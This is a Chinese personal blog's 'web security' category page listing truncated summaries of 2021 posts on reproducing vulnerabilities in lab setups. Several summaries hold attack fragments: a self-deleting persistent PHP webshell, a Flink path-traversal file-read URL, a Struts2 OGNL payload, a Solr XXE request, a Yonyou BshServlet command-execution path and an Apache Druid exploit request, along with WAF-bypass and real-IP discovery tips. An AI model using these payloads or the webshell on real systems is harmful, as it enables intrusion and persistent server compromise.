随笔分类 -  web安全

摘要:百度了个不死马想用一下,发现报错。。。。 这样写的 <?php set_time_limit(0); ignore_user_abort(1); #1表示,忽略与客户端断开连接,继续执行脚本 unlink(__FILE__); #执行完后删除自身 while (1) { $content = "<? 阅读全文
posted @ 2021-12-22 09:38 Tankcz 阅读(380) 评论(0) 推荐(0)
摘要:1.导入表格处xss 在导入功能处导入表格,将xss语句写入表格中,经过导入处理写入html页面中 2.详情处xss 在新增功能处,用户可以输入新增的名称,名称处经过xss语句过滤,原样写入,不会弹xss,但是新增后有一个查看详情的功能 详情的超链接以用户输入的名称为地址,通过输入的名称弹查看详情的 阅读全文
posted @ 2021-12-17 09:49 Tankcz 阅读(174) 评论(0) 推荐(0)
摘要:1.git泄漏 2.svn泄漏 3.扫描备份文件 4.fofa搜特征,批量扫描备份文件 5.github搜代码,具体方法在搜索url输入&type=code,表示搜索代码,然后找一些网站的html代码搜索 感谢补天群里的表哥,今天又学习到了满满的干货 2021.8.28 20:13 笔记 补充 6. 阅读全文
posted @ 2021-08-28 20:14 Tankcz 阅读(2927) 评论(0) 推荐(0)
摘要:vvulhub搭建 docker-compose up -d 访问8081端口,进入控制面板 任意文件读取exp http:/x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f.. 阅读全文
posted @ 2021-07-09 15:43 Tankcz 阅读(373) 评论(0) 推荐(0)
摘要:使用vulhub搭建 docker-compose build docker-compose up -d 访问8080端口,进去是空白的 抓包使用exp ${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberA 阅读全文
posted @ 2021-07-08 13:29 Tankcz 阅读(111) 评论(0) 推荐(0)
摘要:今天挖洞时遇见了个Struts2的漏洞,利用时才发现没工具,决定复现一下,写一下利用脚本 docker搭建 访问8080端口,进去是空白的 然后按照poc访问,主页是这样的 验证poc:http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actio 阅读全文
posted @ 2021-07-07 17:44 Tankcz 阅读(107) 评论(0) 推荐(0)
摘要:创建漏洞环境 访问8983端口 写好一个dtd文件 发送请求包 GET /solr/demo/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3 阅读全文
posted @ 2021-07-02 08:55 Tankcz 阅读(92) 评论(0) 推荐(0)
摘要:影响版本 Windows Server 2019 (Server Core installation) Windows Server 2019 Windows Server 2016 (Server Core installation) Windows Server 2016 Windows Ser 阅读全文
posted @ 2021-06-30 11:42 Tankcz 阅读(143) 评论(0) 推荐(0)
摘要:docker搭建环境 Docker-compose up -d 启动 访问127.0.0.1:8080 通过tomcat/tomcat进入后台 制作war包 上传 原文:https://www.cnblogs.com/qianxinggz/p/13440366.html 阅读全文
posted @ 2021-06-29 16:19 Tankcz 阅读(42) 评论(0) 推荐(0)
摘要:原文:https://x.threatbook.cn/v5/article?threatInfoID=836 直接复制过来的,记录学习一下 过滤and or or ——> ||and ——> &&xor ——> | not ——> !十六进制绕过or ——> o\x72大小写绕过OraNd双写绕过o 阅读全文
posted @ 2021-06-21 15:23 Tankcz 阅读(152) 评论(0) 推荐(0)
摘要:记一下用友的命令执行 Poc: http://ip:port/servlet/~ic/bsh.servlet.BshServlet 然后exec(“commend”) 影响版本 6.5 阅读全文
posted @ 2021-06-06 17:59 Tankcz 阅读(340) 评论(0) 推荐(0)
摘要:我自己常用的方法 一个网站无CDN,批量ping所有响应ip都一样 有CDN,返回多个响应ip 方法1 ssl证书:https://censys.io/ipv4 2.国外访问 3.子域名有时候无CDN 4.搜索引擎 通过网站的ico图标查找 将ico图标链接直接复制到fofa搜索框可以转换图标has 阅读全文
posted @ 2021-05-07 23:18 Tankcz 阅读(339) 评论(0) 推荐(0)
摘要:1.Client-IP 2.X-Forwarded-For 阅读全文
posted @ 2021-03-10 10:52 Tankcz 阅读(97) 评论(0) 推荐(0)
摘要:注:本人菜鸟,都是单干,希望有大佬能解答我的疑惑:) 今天遇到了一个奇葩的网站,在登陆处存在报错sql注入 正在开心的注入的时候突然发现查出来的user是空的??? 这是啥情况?虽然用户是空的,但是数据库却查出来了。。。。 一脸懵逼.Jpg 搞不懂,继续往下看,第二次测这个页面的时候随手输了个uni 阅读全文
posted @ 2021-02-25 15:11 Tankcz 阅读(128) 评论(0) 推荐(0)
摘要:记录一下新漏洞复现 apache druid exp POST /druid/indexer/v1/sampler HTTP/1.1Host: 192.168.1.198:8888User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv 阅读全文
posted @ 2021-02-04 10:02 Tankcz 阅读(162) 评论(0) 推荐(0)